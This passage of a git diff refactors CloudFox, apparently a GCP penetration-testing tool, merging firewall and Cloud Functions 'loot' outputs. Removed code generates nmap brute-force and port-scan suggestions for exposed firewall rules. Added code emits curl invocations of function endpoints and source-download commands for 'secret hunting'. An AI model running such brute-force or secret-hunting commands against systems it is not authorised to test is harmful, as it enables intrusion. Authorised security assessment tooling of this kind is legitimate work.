(0.0.0.0/0)\n# Generated by CloudFox\n# These rules allow access from the internet!\n\n", - } - m.LootMap["firewall-high-risk"] = &internal.LootFile{ - Name: "firewall-high-risk", - Contents: "# HIGH RISK Firewall Rules\n# Generated by CloudFox\n# These rules have serious security issues\n\n", - } - m.LootMap["firewall-vpc-peerings"] = &internal.LootFile{ - Name: "firewall-vpc-peerings", - Contents: "# VPC Peering Relationships\n# Generated by CloudFox\n# These networks are connected\n\n", - } - m.LootMap["firewall-exploitation"] = &internal.LootFile{ - Name: "firewall-exploitation", - Contents: "# Firewall Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["firewall-network-tags"] = &internal.LootFile{ - Name: "firewall-network-tags", - Contents: "# Firewall Rules by Network Tag\n# Generated by CloudFox\n# Network tags control which instances receive firewall rules\n\n", - } - m.LootMap["firewall-service-account-rules"] = &internal.LootFile{ - Name: "firewall-service-account-rules", - Contents: "# Firewall Rules by Service Account\n# Generated by CloudFox\n# These rules apply based on instance service account\n\n", - } - m.LootMap["firewall-all-instances-rules"] = &internal.LootFile{ - Name: "firewall-all-instances-rules", - Contents: "# Firewall Rules Applying to ALL Instances\n# Generated by CloudFox\n# These rules have no target tags or SAs - apply to everything!\n\n", - } - m.LootMap["firewall-disabled-rules"] = &internal.LootFile{ - Name: "firewall-disabled-rules", - Contents: "# DISABLED Firewall Rules\n# Generated by CloudFox\n# These rules are inactive but may be enabled later\n\n", - } - m.LootMap["firewall-security-recommendations"] = &internal.LootFile{ - Name: "firewall-security-recommendations", - Contents: "# Firewall Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", + m.LootMap["firewall-commands"] = &internal.LootFile{ + Name: "firewall-commands", + Contents: "# Firewall Commands\n# Generated by CloudFox\n\n", } } func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { - // gcloud commands - m.LootMap["firewall-gcloud-commands"].Contents += fmt.Sprintf( - "# Network: %s (Project: %s)\n"+ + m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + "# Network: %s\n"+ + "# Project: %s\n"+ "gcloud compute networks describe %s --project=%s\n"+ "gcloud compute networks subnets list --network=%s --project=%s\n"+ "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", @@ -248,256 +204,17 @@ func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { network.Name, network.ProjectID, network.Name, network.ProjectID, ) - - // VPC peerings - if len(network.Peerings) > 0 { - m.LootMap["firewall-vpc-peerings"].Contents += fmt.Sprintf( - "# Network: %s (Project: %s)\n", - network.Name, network.ProjectID, - ) - for _, peering := range network.Peerings { - m.LootMap["firewall-vpc-peerings"].Contents += fmt.Sprintf( - " Peering: %s\n"+ - " -> Network: %s\n"+ - " -> State: %s\n"+ - " -> Export Routes: %v\n"+ - " -> Import Routes: %v\n", - peering.Name, - peering.Network, - peering.State, - peering.ExportCustomRoutes, - peering.ImportCustomRoutes, - ) - } - m.LootMap["firewall-vpc-peerings"].Contents += "\n" - } } func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleInfo) { - // gcloud commands - m.LootMap["firewall-gcloud-commands"].Contents += fmt.Sprintf( - "# Rule: %s (Project: %s, Network: %s)\n"+ + m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + "# Rule: %s (%s)\n"+ + "# Project: %s\n"+ "gcloud compute firewall-rules describe %s --project=%s\n\n", - rule.Name, rule.ProjectID, rule.Network, + rule.Name, rule.Network, + rule.ProjectID, rule.Name, rule.ProjectID, ) - - // Public ingress rules - if rule.IsPublicIngress && rule.Direction == "INGRESS" { - m.LootMap["firewall-public-ingress"].Contents += fmt.Sprintf( - "# RULE: %s\n"+ - "# Project: %s, Network: %s\n"+ - "# Priority: %d, Disabled: %v\n"+ - "# Source Ranges: %s\n"+ - "# Allowed: %s\n"+ - "# Target Tags: %s\n"+ - "# Target SAs: %s\n", - rule.Name, - rule.ProjectID, rule.Network, - rule.Priority, rule.Disabled, - strings.Join(rule.SourceRanges, ", "), - formatProtocols(rule.AllowedProtocols), - strings.Join(rule.TargetTags, ", "), - strings.Join(rule.TargetSAs, ", "), - ) - if len(rule.SecurityIssues) > 0 { - m.LootMap["firewall-public-ingress"].Contents += "# Issues:\n" - for _, issue := range rule.SecurityIssues { - m.LootMap["firewall-public-ingress"].Contents += fmt.Sprintf("# - %s\n", issue) - } - } - m.LootMap["firewall-public-ingress"].Contents += "\n" - } - - // High risk rules - if rule.RiskLevel == "HIGH" { - m.LootMap["firewall-high-risk"].Contents += fmt.Sprintf( - "# RULE: %s [HIGH RISK]\n"+ - "# Project: %s, Network: %s\n"+ - "# Direction: %s\n"+ - "# Source Ranges: %s\n"+ - "# Allowed: %s\n"+ - "# Issues:\n", - rule.Name, - rule.ProjectID, rule.Network, - rule.Direction, - strings.Join(rule.SourceRanges, ", "), - formatProtocols(rule.AllowedProtocols), - ) - for _, issue := range rule.SecurityIssues { - m.LootMap["firewall-high-risk"].Contents += fmt.Sprintf("# - %s\n", issue) - } - m.LootMap["firewall-high-risk"].Contents += fmt.Sprintf( - "# Remediation:\n"+ - "gcloud compute firewall-rules update %s --source-ranges=\"10.0.0.0/8\" --project=%s\n"+ - "# Or delete if not needed:\n"+ - "gcloud compute firewall-rules delete %s --project=%s\n\n", - rule.Name, rule.ProjectID, - rule.Name, rule.ProjectID, - ) - } - - // Exploitation commands for high/medium risk - if rule.RiskLevel == "HIGH" || rule.RiskLevel == "MEDIUM" { - m.LootMap["firewall-exploitation"].Contents += fmt.Sprintf( - "# Rule: %s (Project: %s) [%s RISK]\n"+ - "# Network: %s\n"+ - "# Source Ranges: %s\n"+ - "# Allowed: %s\n\n", - rule.Name, rule.ProjectID, rule.RiskLevel, - rule.Network, - strings.Join(rule.SourceRanges, ", "), - formatProtocols(rule.AllowedProtocols), - ) - - // Add specific exploitation suggestions based on allowed ports - for proto, ports := range rule.AllowedProtocols { - if proto == "tcp" || proto == "all" { - for _, port := range ports { - switch port { - case "22": - m.LootMap["firewall-exploitation"].Contents += "# SSH brute force / key-based auth:\n# nmap -p 22 --script ssh-brute \n\n" - case "3389": - m.LootMap["firewall-exploitation"].Contents += "# RDP enumeration:\n# nmap -p 3389 --script rdp-enum-encryption \n\n" - case "3306": - m.LootMap["firewall-exploitation"].Contents += "# MySQL enumeration:\n# nmap -p 3306 --script mysql-info \n\n" - case "5432": - m.LootMap["firewall-exploitation"].Contents += "# PostgreSQL enumeration:\n# nmap -p 5432 --script pgsql-brute \n\n" - } - } - if len(ports) == 0 { - m.LootMap["firewall-exploitation"].Contents += "# All TCP ports allowed - full port scan:\n# nmap -p- \n\n" - } - } - } - } - - // Rules with network tags - if len(rule.TargetTags) > 0 { - m.LootMap["firewall-network-tags"].Contents += fmt.Sprintf( - "# RULE: %s (Project: %s, Network: %s)\n"+ - "# Direction: %s, Priority: %d\n"+ - "# Target Tags: %s\n"+ - "# Allowed: %s\n"+ - "# Find instances with these tags:\n"+ - "gcloud compute instances list --filter=\"tags.items=%s\" --project=%s\n\n", - rule.Name, rule.ProjectID, rule.Network, - rule.Direction, rule.Priority, - strings.Join(rule.TargetTags, ", "), - formatProtocols(rule.AllowedProtocols), - rule.TargetTags[0], rule.ProjectID, - ) - } - - // Rules with service accounts - if len(rule.TargetSAs) > 0 { - m.LootMap["firewall-service-account-rules"].Contents += fmt.Sprintf( - "# RULE: %s (Project: %s, Network: %s)\n"+ - "# Direction: %s, Priority: %d\n"+ - "# Target Service Accounts:\n", - rule.Name, rule.ProjectID, rule.Network, - rule.Direction, rule.Priority, - ) - for _, sa := range rule.TargetSAs { - m.LootMap["firewall-service-account-rules"].Contents += fmt.Sprintf("# - %s\n", sa) - } - m.LootMap["firewall-service-account-rules"].Contents += fmt.Sprintf( - "# Allowed: %s\n"+ - "# Find instances with these SAs:\n"+ - "gcloud compute instances list --filter=\"serviceAccounts.email=%s\" --project=%s\n\n", - formatProtocols(rule.AllowedProtocols), - rule.TargetSAs[0], rule.ProjectID, - ) - } - - // Rules applying to all instances (no tags or SAs) - if len(rule.TargetTags) == 0 && len(rule.TargetSAs) == 0 { - m.LootMap["firewall-all-instances-rules"].Contents += fmt.Sprintf( - "# RULE: %s (Project: %s, Network: %s)\n"+ - "# Direction: %s, Priority: %d\n"+ - "# Source Ranges: %s\n"+ - "# Allowed: %s\n"+ - "# WARNING: Applies to ALL instances in the network!\n\n", - rule.Name, rule.ProjectID, rule.Network, - rule.Direction, rule.Priority, - strings.Join(rule.SourceRanges, ", "), - formatProtocols(rule.AllowedProtocols), - ) - } - - // Disabled rules - if rule.Disabled { - m.LootMap["firewall-disabled-rules"].Contents += fmt.Sprintf( - "# RULE: %s (Project: %s, Network: %s)\n"+ - "# Direction: %s, Priority: %d\n"+ - "# Source Ranges: %s\n"+ - "# Allowed: %s\n"+ - "# Enable with:\n"+ - "gcloud compute firewall-rules update %s --no-disabled --project=%s\n\n", - rule.Name, rule.ProjectID, rule.Network, - rule.Direction, rule.Priority, - strings.Join(rule.SourceRanges, ", "), - formatProtocols(rule.AllowedProtocols), - rule.Name, rule.ProjectID, - ) - } - - // Security recommendations - m.addFirewallSecurityRecommendations(rule) -} - -// addFirewallSecurityRecommendations adds remediation commands for firewall security issues -func (m *FirewallModule) addFirewallSecurityRecommendations(rule NetworkService.FirewallRuleInfo) { - hasRecommendations := false - recommendations := fmt.Sprintf( - "# RULE: %s (Project: %s, Network: %s)\n", - rule.Name, rule.ProjectID, rule.Network, - ) - - // Public ingress - if rule.IsPublicIngress && rule.Direction == "INGRESS" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Allows ingress from 0.0.0.0/0 (internet)\n"+ - "# Restrict source ranges:\n"+ - "gcloud compute firewall-rules update %s \\\n"+ - " --source-ranges=\"10.0.0.0/8\" \\\n"+ - " --project=%s\n\n", - rule.Name, rule.ProjectID, - ) - } - - // All ports allowed - for proto, ports := range rule.AllowedProtocols { - if len(ports) == 0 && (proto == "all" || proto == "tcp" || proto == "udp") { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Allows all %s ports\n"+ - "# Restrict to specific ports:\n"+ - "gcloud compute firewall-rules update %s \\\n"+ - " --allow=\"tcp:80,tcp:443\" \\\n"+ - " --project=%s\n\n", - proto, rule.Name, rule.ProjectID, - ) - } - } - - // No target restriction - if len(rule.TargetTags) == 0 && len(rule.TargetSAs) == 0 && rule.IsPublicIngress { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Applies to ALL instances with public ingress\n"+ - "# Add target tags or SAs to limit scope:\n"+ - "gcloud compute firewall-rules update %s \\\n"+ - " --target-tags=\"web-server\" \\\n"+ - " --project=%s\n\n", - rule.Name, rule.ProjectID, - ) - } - - if hasRecommendations { - m.LootMap["firewall-security-recommendations"].Contents += recommendations + "\n" - } } // ------------------------------ @@ -515,39 +232,33 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger "Source Ranges", "Allowed", "Targets", - "Risk", - "Issues", + "Disabled", + "Logging", } var rulesBody [][]string for _, rule := range m.FirewallRules { - // Format source ranges + // Format source ranges - no truncation sources := strings.Join(rule.SourceRanges, ", ") - if len(sources) > 30 { - sources = sources[:27] + "..." + if sources == "" { + sources = "-" } - // Format allowed protocols - allowed := formatProtocolsShort(rule.AllowedProtocols) + // Format allowed protocols - no truncation + allowed := formatProtocols(rule.AllowedProtocols) + if allowed == "" { + allowed = "-" + } - // Format targets + // Format targets - no truncation targets := "-" if len(rule.TargetTags) > 0 { - targets = strings.Join(rule.TargetTags, ",") + targets = strings.Join(rule.TargetTags, ", ") } else if len(rule.TargetSAs) > 0 { - targets = "SAs:" + fmt.Sprintf("%d", len(rule.TargetSAs)) + targets = strings.Join(rule.TargetSAs, ", ") } else { targets = "ALL" } - if len(targets) > 20 { - targets = targets[:17] + "..." - } - - // Format issues count - issues := "-" - if len(rule.SecurityIssues) > 0 { - issues = fmt.Sprintf("%d issue(s)", len(rule.SecurityIssues)) - } rulesBody = append(rulesBody, []string{ m.GetProjectName(rule.ProjectID), @@ -559,8 +270,8 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger sources, allowed, targets, - rule.RiskLevel, - issues, + boolToYesNo(rule.Disabled), + boolToYesNo(rule.LoggingEnabled), }) } @@ -580,7 +291,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger // Count subnets subnetCount := len(network.Subnetworks) - // Format peerings + // Format peerings - no truncation peerings := "-" if len(network.Peerings) > 0 { var peerNames []string @@ -588,15 +299,6 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger peerNames = append(peerNames, p.Name) } peerings = strings.Join(peerNames, ", ") - if len(peerings) > 30 { - peerings = fmt.Sprintf("%d peering(s)", len(network.Peerings)) - } - } - - // Format auto subnets - autoSubnets := "No" - if network.AutoCreateSubnetworks { - autoSubnets = "Yes" } networksBody = append(networksBody, []string{ @@ -606,7 +308,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger network.RoutingMode, fmt.Sprintf("%d", subnetCount), peerings, - autoSubnets, + boolToYesNo(network.AutoCreateSubnetworks), }) } @@ -623,11 +325,6 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger var subnetsBody [][]string for _, subnet := range m.Subnets { - privateAccess := "No" - if subnet.PrivateIPGoogleAccess { - privateAccess = "Yes" - } - subnetsBody = append(subnetsBody, []string{ m.GetProjectName(subnet.ProjectID), subnet.ProjectID, @@ -635,7 +332,7 @@ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger subnet.Name, subnet.Region, subnet.IPCidrRange, - privateAccess, + boolToYesNo(subnet.PrivateIPGoogleAccess), }) } @@ -717,21 +414,3 @@ func formatProtocols(protocols map[string][]string) string { return strings.Join(parts, "; ") } -// formatProtocolsShort formats protocols for table display -func formatProtocolsShort(protocols map[string][]string) string { - var parts []string - for proto, ports := range protocols { - if len(ports) == 0 { - parts = append(parts, proto+":*") - } else if len(ports) > 3 { - parts = append(parts, fmt.Sprintf("%s:%d ports", proto, len(ports))) - } else { - parts = append(parts, proto+":"+strings.Join(ports, ",")) - } - } - result := strings.Join(parts, " ") - if len(result) > 25 { - return result[:22] + "..." - } - return result -} diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index 59a926b0..51c2347e 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -48,10 +48,9 @@ Attack Surface: type FunctionsModule struct { gcpinternal.BaseGCPModule - Functions []FunctionsService.FunctionInfo - SecurityAnalysis []FunctionsService.FunctionSecurityAnalysis - LootMap map[string]*internal.LootFile - mu sync.Mutex + Functions []FunctionsService.FunctionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -75,10 +74,9 @@ func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { } module := &FunctionsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Functions: []FunctionsService.FunctionInfo{}, - SecurityAnalysis: []FunctionsService.FunctionSecurityAnalysis{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Functions: []FunctionsService.FunctionInfo{}, + LootMap: make(map[string]*internal.LootFile), } module.initializeLootFiles() @@ -135,10 +133,6 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, for _, fn := range functions { m.addFunctionToLoot(fn) - // Perform security analysis - analysis := fs.AnalyzeFunctionSecurity(fn) - m.SecurityAnalysis = append(m.SecurityAnalysis, analysis) - m.addSecurityAnalysisToLoot(analysis, fn) } m.mu.Unlock() @@ -151,30 +145,9 @@ func (m *FunctionsModule) processProject(ctx context.Context, projectID string, // Loot File Management // ------------------------------ func (m *FunctionsModule) initializeLootFiles() { - m.LootMap["functions-gcloud-commands"] = &internal.LootFile{ - Name: "functions-gcloud-commands", - Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["functions-exploitation"] = &internal.LootFile{ - Name: "functions-exploitation", - Contents: "# GCP Cloud Functions Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["functions-public"] = &internal.LootFile{ - Name: "functions-public", - Contents: "# PUBLIC GCP Cloud Functions\n# Generated by CloudFox\n# These functions can be invoked by allUsers or allAuthenticatedUsers!\n\n", - } - m.LootMap["functions-http-endpoints"] = &internal.LootFile{ - Name: "functions-http-endpoints", - Contents: "# GCP Cloud Functions HTTP Endpoints\n# Generated by CloudFox\n\n", - } - // Pentest-focused loot files - m.LootMap["functions-security-analysis"] = &internal.LootFile{ - Name: "functions-security-analysis", - Contents: "# Cloud Functions Security Analysis\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["functions-source-locations"] = &internal.LootFile{ - Name: "functions-source-locations", - Contents: "# Cloud Functions Source Code Locations\n# Generated by CloudFox\n# Download and review for hardcoded secrets\n\n", + m.LootMap["functions-commands"] = &internal.LootFile{ + Name: "functions-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap["functions-env-vars"] = &internal.LootFile{ Name: "functions-env-vars", @@ -184,118 +157,68 @@ func (m *FunctionsModule) initializeLootFiles() { Name: "functions-secrets", Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", } - // New enhancement loot files - m.LootMap["functions-internal-only"] = &internal.LootFile{ - Name: "functions-internal-only", - Contents: "# GCP Cloud Functions with Internal-Only Ingress\n# These functions are more secure - only accessible from VPC\n# Generated by CloudFox\n\n", - } - m.LootMap["functions-vpc-connected"] = &internal.LootFile{ - Name: "functions-vpc-connected", - Contents: "# GCP Cloud Functions with VPC Connectors\n# These functions can access internal VPC resources\n# Generated by CloudFox\n\n", - } - m.LootMap["functions-cold-start-risk"] = &internal.LootFile{ - Name: "functions-cold-start-risk", - Contents: "# GCP Cloud Functions Cold Start Risk Analysis\n# Functions with minInstances=0 may have cold starts\n# Generated by CloudFox\n\n", - } - m.LootMap["functions-high-concurrency"] = &internal.LootFile{ - Name: "functions-high-concurrency", - Contents: "# GCP Cloud Functions with High Concurrency Limits\n# High concurrency may indicate high-value targets\n# Generated by CloudFox\n\n", - } - m.LootMap["functions-security-recommendations"] = &internal.LootFile{ - Name: "functions-security-recommendations", - Contents: "# GCP Cloud Functions Security Recommendations\n# Generated by CloudFox\n\n", - } } func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { - // gcloud commands - m.LootMap["functions-gcloud-commands"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s, Region: %s)\n"+ + // All commands for this function + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s, Region: %s)\n"+ + "# Runtime: %s, Trigger: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v, Ingress: %s\n", + fn.Name, fn.ProjectID, fn.Region, + fn.Runtime, fn.TriggerType, + fn.ServiceAccount, + fn.IsPublic, fn.IngressSettings, + ) + + if fn.TriggerURL != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) + } + + if fn.SourceLocation != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) + } + + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "\n# Describe function:\n"+ "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ + "# Get IAM policy:\n"+ "gcloud functions get-iam-policy %s --region=%s --project=%s --gen2\n"+ - "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n\n", - fn.Name, fn.ProjectID, fn.Region, + "# Read logs:\n"+ + "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n", fn.Name, fn.Region, fn.ProjectID, fn.Name, fn.Region, fn.ProjectID, fn.Name, fn.Region, fn.ProjectID, ) - // Exploitation commands + // HTTP invocation commands if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { - m.LootMap["functions-exploitation"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s)\n"+ - "# Ingress: %s, Service Account: %s\n"+ - "# Test invocation (GET):\n"+ + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "# Invoke (GET):\n"+ "curl -s '%s'\n"+ - "# Test invocation (POST with auth):\n"+ + "# Invoke (POST with auth):\n"+ "curl -s -X POST '%s' \\\n"+ " -H 'Authorization: Bearer $(gcloud auth print-identity-token)' \\\n"+ " -H 'Content-Type: application/json' \\\n"+ - " -d '{\"test\": \"data\"}'\n\n", - fn.Name, fn.ProjectID, - fn.IngressSettings, fn.ServiceAccount, + " -d '{\"test\": \"data\"}'\n", fn.TriggerURL, fn.TriggerURL, ) } - // Public functions - if fn.IsPublic { - m.LootMap["functions-public"].Contents += fmt.Sprintf( - "# FUNCTION: %s\n"+ - "# Project: %s, Region: %s\n"+ - "# Invokers: %s\n"+ - "# Service Account: %s\n"+ - "# Ingress: %s\n", - fn.Name, - fn.ProjectID, fn.Region, - strings.Join(fn.InvokerMembers, ", "), - fn.ServiceAccount, - fn.IngressSettings, - ) - if fn.TriggerURL != "" { - m.LootMap["functions-public"].Contents += fmt.Sprintf( - "# URL: %s\n"+ - "curl -s '%s'\n", - fn.TriggerURL, - fn.TriggerURL, - ) - } - m.LootMap["functions-public"].Contents += "\n" - } - - // HTTP endpoints list - if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { - publicMarker := "" - if fn.IsPublic { - publicMarker = " [PUBLIC]" - } - m.LootMap["functions-http-endpoints"].Contents += fmt.Sprintf( - "%s%s\n", - fn.TriggerURL, publicMarker, + // Source download command + if fn.SourceType == "GCS" && fn.SourceLocation != "" { + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "# Download source:\n"+ + "gsutil cp %s ./function-source-%s.zip\n", + fn.SourceLocation, fn.Name, ) } - // Source code locations - if fn.SourceLocation != "" { - m.LootMap["functions-source-locations"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s, Region: %s)\n"+ - "# Source Type: %s\n"+ - "# Location: %s\n", - fn.Name, fn.ProjectID, fn.Region, - fn.SourceType, fn.SourceLocation, - ) - if fn.SourceType == "GCS" { - m.LootMap["functions-source-locations"].Contents += fmt.Sprintf( - "gsutil cp %s ./function-source-%s.zip\n\n", - fn.SourceLocation, fn.Name, - ) - } else { - m.LootMap["functions-source-locations"].Contents += "\n" - } - } + m.LootMap["functions-commands"].Contents += "\n" - // Environment variable names + // Environment variable names (keep separate - useful for secret hunting) if len(fn.EnvVarNames) > 0 { m.LootMap["functions-env-vars"].Contents += fmt.Sprintf( "## Function: %s (Project: %s)\n", @@ -307,7 +230,7 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { m.LootMap["functions-env-vars"].Contents += "\n" } - // Secret references + // Secret references (keep separate - useful for secret hunting) if len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0 { m.LootMap["functions-secrets"].Contents += fmt.Sprintf( "## Function: %s (Project: %s)\n", @@ -327,153 +250,13 @@ func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { } m.LootMap["functions-secrets"].Contents += "\n" } - - // Enhancement: Internal-only functions - if fn.IngressSettings == "ALLOW_INTERNAL_ONLY" || fn.IngressSettings == "INTERNAL_ONLY" { - m.LootMap["functions-internal-only"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s, Region: %s)\n"+ - "# Ingress: %s - Only accessible from VPC\n"+ - "# VPC Connector: %s\n\n", - fn.Name, fn.ProjectID, fn.Region, - fn.IngressSettings, - fn.VPCConnector, - ) - } - - // Enhancement: VPC-connected functions - if fn.VPCConnector != "" { - m.LootMap["functions-vpc-connected"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s, Region: %s)\n"+ - "# VPC Connector: %s\n"+ - "# Egress: %s\n"+ - "# Lateral Movement Potential: This function can access VPC resources\n\n", - fn.Name, fn.ProjectID, fn.Region, - fn.VPCConnector, - fn.VPCEgressSettings, - ) - } - - // Enhancement: Cold start risk - if fn.MinInstanceCount == 0 { - m.LootMap["functions-cold-start-risk"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s, Region: %s)\n"+ - "# Min Instances: %d (cold starts expected)\n"+ - "# Max Instances: %d\n"+ - "# Memory: %d MB, Timeout: %ds\n"+ - "# Remediation: Set min instances to reduce cold starts\n"+ - "gcloud functions deploy %s --region=%s --min-instances=1 --gen2\n\n", - fn.Name, fn.ProjectID, fn.Region, - fn.MinInstanceCount, - fn.MaxInstanceCount, - fn.AvailableMemoryMB, fn.TimeoutSeconds, - fn.Name, fn.Region, - ) - } - - // Enhancement: High concurrency functions - if fn.MaxInstanceCount > 100 || fn.MaxInstanceRequestConcurrency > 80 { - m.LootMap["functions-high-concurrency"].Contents += fmt.Sprintf( - "# Function: %s (Project: %s, Region: %s)\n"+ - "# Max Instances: %d\n"+ - "# Max Concurrent Requests/Instance: %d\n"+ - "# Effective Concurrency: ~%d requests\n"+ - "# This is a high-traffic function - potential high-value target\n\n", - fn.Name, fn.ProjectID, fn.Region, - fn.MaxInstanceCount, - fn.MaxInstanceRequestConcurrency, - fn.MaxInstanceCount*fn.MaxInstanceRequestConcurrency, - ) - } - - // Add security recommendations - m.addFunctionSecurityRecommendations(fn) -} - -// addFunctionSecurityRecommendations generates security recommendations for a function -func (m *FunctionsModule) addFunctionSecurityRecommendations(fn FunctionsService.FunctionInfo) { - hasRecommendations := false - recommendations := fmt.Sprintf("# FUNCTION: %s (Project: %s, Region: %s)\n", fn.Name, fn.ProjectID, fn.Region) - - // Public access - if fn.IsPublic { - hasRecommendations = true - recommendations += "# [CRITICAL] Function is publicly accessible\n" - recommendations += fmt.Sprintf("# Remediation: Remove public access\n") - recommendations += fmt.Sprintf("gcloud functions remove-iam-policy-binding %s --region=%s --member=allUsers --role=roles/cloudfunctions.invoker --gen2\n", fn.Name, fn.Region) - } - - // All traffic ingress - if fn.IngressSettings == "ALLOW_ALL" || fn.IngressSettings == "ALL_TRAFFIC" { - hasRecommendations = true - recommendations += "# [MEDIUM] Function allows all ingress traffic\n" - recommendations += "# Remediation: Restrict to internal or GCLB\n" - recommendations += fmt.Sprintf("gcloud functions deploy %s --region=%s --ingress-settings=internal-only --gen2\n", fn.Name, fn.Region) - } - - // Default service account - if strings.Contains(fn.ServiceAccount, "-compute@developer.gserviceaccount.com") || - strings.Contains(fn.ServiceAccount, "@appspot.gserviceaccount.com") { - hasRecommendations = true - recommendations += "# [HIGH] Uses default service account with potentially excessive permissions\n" - recommendations += "# Remediation: Create a dedicated service account with minimal permissions\n" - } - - // No min instances (cold start) - if fn.MinInstanceCount == 0 { - hasRecommendations = true - recommendations += "# [LOW] No minimum instances configured - cold starts expected\n" - recommendations += fmt.Sprintf("gcloud functions deploy %s --region=%s --min-instances=1 --gen2\n", fn.Name, fn.Region) - } - - // VPC connector without egress restriction - if fn.VPCConnector != "" && fn.VPCEgressSettings != "PRIVATE_RANGES_ONLY" { - hasRecommendations = true - recommendations += "# [MEDIUM] VPC connector without private-only egress\n" - recommendations += "# The function can reach both VPC and public internet\n" - recommendations += fmt.Sprintf("gcloud functions deploy %s --region=%s --vpc-connector=%s --egress-settings=private-ranges-only --gen2\n", - fn.Name, fn.Region, fn.VPCConnector) - } - - if hasRecommendations { - m.LootMap["functions-security-recommendations"].Contents += recommendations + "\n" - } -} - -func (m *FunctionsModule) addSecurityAnalysisToLoot(analysis FunctionsService.FunctionSecurityAnalysis, fn FunctionsService.FunctionInfo) { - if analysis.RiskLevel == "CRITICAL" || analysis.RiskLevel == "HIGH" || analysis.RiskLevel == "MEDIUM" { - m.LootMap["functions-security-analysis"].Contents += fmt.Sprintf( - "## [%s] Function: %s\n"+ - "## Project: %s, Region: %s\n"+ - "## Service Account: %s\n"+ - "## Public: %v\n", - analysis.RiskLevel, analysis.FunctionName, - analysis.ProjectID, analysis.Region, - analysis.ServiceAccount, - analysis.IsPublic, - ) - - if len(analysis.RiskReasons) > 0 { - m.LootMap["functions-security-analysis"].Contents += "## Risk Reasons:\n" - for _, reason := range analysis.RiskReasons { - m.LootMap["functions-security-analysis"].Contents += fmt.Sprintf("## - %s\n", reason) - } - } - - if len(analysis.ExploitCommands) > 0 { - m.LootMap["functions-security-analysis"].Contents += "## Exploitation Commands:\n" - for _, cmd := range analysis.ExploitCommands { - m.LootMap["functions-security-analysis"].Contents += cmd + "\n" - } - } - m.LootMap["functions-security-analysis"].Contents += "\n" - } } // ------------------------------ // Output Generation // ------------------------------ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main functions table + // Functions table with one row per IAM binding header := []string{ "Project Name", "Project ID", @@ -482,177 +265,88 @@ func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logge "State", "Runtime", "Trigger", + "URL", "Ingress", "Public", "Service Account", "VPC Connector", "Secrets", + "IAM Role", + "IAM Member", } var body [][]string for _, fn := range m.Functions { - // Format public status - publicStatus := "No" - if fn.IsPublic { - publicStatus = "PUBLIC" - } - - // Format secrets count - secretsInfo := "-" - totalSecrets := fn.SecretEnvVarCount + fn.SecretVolumeCount - if totalSecrets > 0 { - secretsInfo = fmt.Sprintf("%d env, %d vol", fn.SecretEnvVarCount, fn.SecretVolumeCount) - } - // Format trigger info triggerInfo := fn.TriggerType if fn.TriggerEventType != "" { - triggerInfo = fmt.Sprintf("%s (%s)", fn.TriggerType, fn.TriggerEventType) + triggerInfo = fn.TriggerType } - // Shorten service account for display - saDisplay := fn.ServiceAccount - if strings.Contains(saDisplay, "@") { - parts := 